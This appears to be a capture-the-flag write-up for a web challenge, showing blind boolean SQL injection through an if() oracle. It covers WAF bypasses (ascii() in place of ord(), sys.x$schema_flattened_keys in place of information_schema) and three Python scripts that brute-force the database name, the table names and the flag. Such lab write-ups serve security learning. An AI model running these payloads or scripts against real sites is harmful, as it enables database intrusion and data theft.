When id=1, the page shows:
Nu1L
When id=2, the page shows:
V&N
When id=0 (a non-existent row), the page shows:
Error Occured When Fetch Result.
When the WAF is triggered, the page shows:
SQL Injection Checked.
Enter if(0,1,2): since 0 is false, this is equivalent to id=2 and the page outputs V&N.
Enter if(1,1,2): since 1 is true, this is equivalent to id=1 and the page outputs Nu1L.
Check the length of the current database name; when it equals 21 the page returns Nu1L, which proves the condition is true:
if((length(database()))=21,1,2)
The combination “if(ord” is filtered, so replacing ord() with ascii() gets through:
```python
import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Condition: if((ascii(substr(database(),i,1))=j),1,2)
payload1 = "if((ascii(substr(database(),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1, 22):            # database name is 21 characters long
    for j in range(23, 123):      # printable ASCII range to test
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        data = {'id': payload}
        s = requests.post(url, data=data).text
        if "Nu1L" in s:           # true branch -> id=1 -> Nu1L
            name += chr(j)
            print(name)
            break
```
The database name is give_grandpa_pa_pa_pa. Next, dump the table names. information_schema is filtered; after some searching, sys.x$schema_flattened_keys can be used instead.
Check the total length of the table names; when it equals 39 the page returns Nu1L, which proves the condition is true:
if((select(length(group_concat(TABLE_NAME)))from(sys.x$schema_flattened_keys)where(table_schema=database()))=39,1,2)
Dump the table names:
```python
import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Same boolean condition as before, but the string under test is the
# comma-joined list of table names taken from sys.x$schema_flattened_keys
payload1 = "if((ascii(substr((select(group_concat(TABLE_NAME))from(sys.x$schema_flattened_keys)where(table_schema=database())),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1, 40):            # group_concat result is 39 characters long
    for j in range(23, 123):
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        data = {'id': payload}
        s = requests.post(url, data=data).text
        if "Nu1L" in s:
            name += chr(j)
            print(name)
            break
```
Two table names are obtained: f1ag_1s_h3r3_hhhhh and users233333333333333
Normally the next step would be to dump the column names, but since information_schema is filtered I skipped that and simply guessed that the flag is in the flag column. I adjusted the length a bit and switched to a small dictionary to speed things up.
```python
import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Condition: if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh)),i,1))=j,1,2)
payload1 = "if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh)),"
payload2 = ",1))="
payload3 = ",1,2)"
name = ""
# Small character set instead of the full ASCII range, to cut the request count
dic = "qwertyuioplkjhgfdsazxcvbnmQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890-{}"
for i in range(1, 50):            # upper bound on the flag length
    for j in dic:
        payload = payload1 + str(i) + payload2 + str(ord(j)) + payload3
        data = {'id': payload}
        s = requests.post(url, data=data).text
        if "Nu1L" in s:
            name += j
            print(name)
            break
```